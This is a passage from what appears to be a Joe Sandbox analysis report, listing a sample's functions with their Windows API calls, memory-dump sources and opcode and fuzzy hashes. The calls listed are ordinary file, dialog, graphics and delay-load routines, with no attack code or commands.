                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 94a0e2a7a40acddbbfd0b5e1316edf857fb5051f23d787cd95ed09e66501aae1
                                                                      • Instruction ID: 08925c10da9596860389136687395eac0faf88d0363ac1214f038ee2c6f60f02
                                                                      • Opcode Fuzzy Hash: 94a0e2a7a40acddbbfd0b5e1316edf857fb5051f23d787cd95ed09e66501aae1
                                                                      • Instruction Fuzzy Hash: 48018C30810794DAD725E7B8C049BEDFBB49F64304F58848EE45653382CBB86B08D7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9620 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,007C95D6,?,?,?,?,?,007F2641,000000FF), ref: 007C963B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: caebed772d8e3dbe17b77574a458eb814da0bb3d9ae68c14f8a7e4536e8c76a9
                                                                      • Instruction ID: b0d57f7d90305979e3da3214fcfcab4e11c5d635369c207de62d7b684a2661ef
                                                                      • Opcode Fuzzy Hash: caebed772d8e3dbe17b77574a458eb814da0bb3d9ae68c14f8a7e4536e8c76a9
                                                                      • Instruction Fuzzy Hash: CFF08270482B159FDB708A64C85CF92B7F8AB12331F145B1ED2E7629E0D779698DCA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007CA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6C4
                                                                        • Part of subcall function 007CA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6F2
                                                                        • Part of subcall function 007CA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6FE
                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007CA598
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Find$FileFirst$CloseErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1464966427-0
                                                                      • Opcode ID: a6c9b9025a38e85067a93bd1b8af661639a5e0926e13b0c8bf7c8ed1a6b7cc22
                                                                      • Instruction ID: bb424e2fb7074ab3ccd3b64ac235d93a74813781a01ee987c677f109781e61e1
                                                                      • Opcode Fuzzy Hash: a6c9b9025a38e85067a93bd1b8af661639a5e0926e13b0c8bf7c8ed1a6b7cc22
                                                                      • Instruction Fuzzy Hash: 77F0BE32008394FACA2257B48808FCA7B906F1A33AF04CA4DF0F952096C26910A48B33
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 007D0E3D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ExecutionStateThread
                                                                      • String ID:
                                                                      • API String ID: 2211380416-0
                                                                      • Opcode ID: 59d3d4bea15ee2f8d7d3694644b4d293958089838c0e36522c19def32a716b7e
                                                                      • Instruction ID: 6a8d6a7549d21a388f0393257c04020b2be10bc59de3ce5e17658bb790d570e6
                                                                      • Opcode Fuzzy Hash: 59d3d4bea15ee2f8d7d3694644b4d293958089838c0e36522c19def32a716b7e
                                                                      • Instruction Fuzzy Hash: 01D01251602094A6EE213339686DBFE27269FC6321F4D006FB18557382CE5C4C86A2B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 007DA62C
                                                                        • Part of subcall function 007DA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007DA3DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                      • String ID:
                                                                      • API String ID: 1915507550-0
                                                                      • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                      • Instruction ID: 02182877333e7ae474f1bdb3b37b87b9d246cfea7820f9d2f241a5eb828ff58d
                                                                      • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                      • Instruction Fuzzy Hash: 5FD0C971214209FADF426B61CC16D6E7ABAFB01340F048127B842D9391EAF9E910A662
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,007D1B3E), ref: 007DDD92
                                                                        • Part of subcall function 007DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DB579
                                                                        • Part of subcall function 007DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB58A
                                                                        • Part of subcall function 007DB568: IsDialogMessageW.USER32(0001047C,?), ref: 007DB59E
                                                                        • Part of subcall function 007DB568: TranslateMessage.USER32(?), ref: 007DB5AC
                                                                        • Part of subcall function 007DB568: DispatchMessageW.USER32(?), ref: 007DB5B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                      • String ID:
                                                                      • API String ID: 897784432-0
                                                                      • Opcode ID: 71be923d89469848a577f644aedac881568609d814129601bbc564ec1c2a3ce7
                                                                      • Instruction ID: f418f95ce230fe2506701ead8c291af21c6eb134223bdd19eaaa4c8cf6b92fa6
                                                                      • Opcode Fuzzy Hash: 71be923d89469848a577f644aedac881568609d814129601bbc564ec1c2a3ce7
                                                                      • Instruction Fuzzy Hash: 34D09E31144300FAD6122B51DD0AF0A7AB2BB88B04F404555B285740B18676AE71DF15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DloadProtectSection.DELAYIMP ref: 007DE5E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DloadProtectSection
                                                                      • String ID:
                                                                      • API String ID: 2203082970-0
                                                                      • Opcode ID: 491fceac09d2015b027954d92d18a6fda0db720a1f9c8e8ea4aa2b893f53a6e2
                                                                      • Instruction ID: 9151c0985221c0f21dd1af735b3b5b0d1f4772a1a022ad24e247640f7652ce2e
                                                                      • Opcode Fuzzy Hash: 491fceac09d2015b027954d92d18a6fda0db720a1f9c8e8ea4aa2b893f53a6e2
                                                                      • Instruction Fuzzy Hash: 78D0A9B8080240CACA13FBA8AC8E7143370B330B40FE04153F216CA390CA6C8081C605
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileType.KERNELBASE(000000FF,007C97BE), ref: 007C98C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      • Opcode ID: 139e764b98270b3498058b3be82b6c06815304738c2d7e6ebdb0d0cbf8ccf2da
                                                                      • Instruction ID: e32a8b5cee2e588f2e38cb09685c06164e9769ec45c0d4b5b7272d3ce39a3871
                                                                      • Opcode Fuzzy Hash: 139e764b98270b3498058b3be82b6c06815304738c2d7e6ebdb0d0cbf8ccf2da
                                                                      • Instruction Fuzzy Hash: 79C01234400206968EA08A24984C9A977A2AB533A67B486DCC2288A0E1C32ACC87EB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 93cdf609a77bace700fa386b238fc2167c95f0e707b51dbd52e39a92ca3a1066
                                                                      • Instruction ID: 35c954b4a7da728ffb241c0d339c7a16dd2790a10b1f0623f07d5e048f78c9b3
                                                                      • Opcode Fuzzy Hash: 93cdf609a77bace700fa386b238fc2167c95f0e707b51dbd52e39a92ca3a1066
                                                                      • Instruction Fuzzy Hash: 33B012E129C054FD3106B1442D06C37022CD5C0B10330D02FFA04C9380D84C4C481433
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: ac3eb0d56b33b5adb58cfe0476b55ee897eb810d37eb6ca4ab72b43d8686d6e8
                                                                      • Instruction ID: e0234313aca4ded063d4b6979aa9547b50024e3353ffa62d5756633466e5630a
                                                                      • Opcode Fuzzy Hash: ac3eb0d56b33b5adb58cfe0476b55ee897eb810d37eb6ca4ab72b43d8686d6e8
                                                                      • Instruction Fuzzy Hash: 10B012F129C054FC3106B1442D06C37022CC5C0F10330902FFA04C9380D84C4E441433
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: cc0618744a201bd22b5de2d4d9855dc8079a8a4cdeae3da05260cac7fa660e88
                                                                      • Instruction ID: f8b3950adb916fc97f2f4906c994c460fbb5c9d35d83afcadc319a76bbffd5be
                                                                      • Opcode Fuzzy Hash: cc0618744a201bd22b5de2d4d9855dc8079a8a4cdeae3da05260cac7fa660e88
                                                                      • Instruction Fuzzy Hash: 31B012E139C054BD310671442E06C37022CD4C0B10330D02FF704D9380D84C0C4D1433
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: cef8b9d49d75cb7cf17f9c9feb3b110fcc5bc26acde54ad5fa7b65db511efc62
                                                                      • Instruction ID: fe2fdc4d9e80fb2cbdde09b753f60f31bf88a5058fc6bb04767b67b200553997
                                                                      • Opcode Fuzzy Hash: cef8b9d49d75cb7cf17f9c9feb3b110fcc5bc26acde54ad5fa7b65db511efc62
                                                                      • Instruction Fuzzy Hash: 25B012C125C154FC314671947E07C37013CD4C0B11330523FF505C93C0E84C0DA41431
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: 58172db222d7b65808497f431e88633dec6aaf71a1cfc96b4b3bb2a7f8914073
                                                                      • Instruction ID: 71e9b153f28d069060c4454b0581da821e73c4f5028aca32a2eb317a0fc87310
                                                                      • Opcode Fuzzy Hash: 58172db222d7b65808497f431e88633dec6aaf71a1cfc96b4b3bb2a7f8914073
                                                                      • Instruction Fuzzy Hash: 7EB092C1658054BC310671946E06C360128D480B11320522BB505C9280A8480A651431
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE580
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: cc09b69ba798cb3bafdbbb86dd2f0867fb9b9b8ce9443b07e5b244362897623d
                                                                      • Instruction ID: 3ae75a3d9d556cff40d415036fec04d224ed6c94847955c5617449322bef0304
                                                                      • Opcode Fuzzy Hash: cc09b69ba798cb3bafdbbb86dd2f0867fb9b9b8ce9443b07e5b244362897623d
                                                                      • Instruction Fuzzy Hash: FFB012C125C158FD310671943E06C37012CE4C0B11330513FF505C93C0E84C0D641431
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE3FC
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID:
                                                                      • API String ID: 1269201914-0
                                                                      • Opcode ID: e08661f82390f28779494b8ddafba7f0c5a95c1bf71257c33579cf48e6390eee
                                                                      • Instruction ID: 8137a2fa1afeadfdba74e6ba401988ed84a06cfb21f311fd07c8fff3b420c025
                                                                      • Opcode Fuzzy Hash: e08661f82390f28779494b8ddafba7f0c5a95c1bf71257c33579cf48e6390eee
                                                                      • Instruction Fuzzy Hash: CCA001E62A919ABD350A72516E0AC3B022DC8C1B25330A52FF925E9681AC9818452872
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
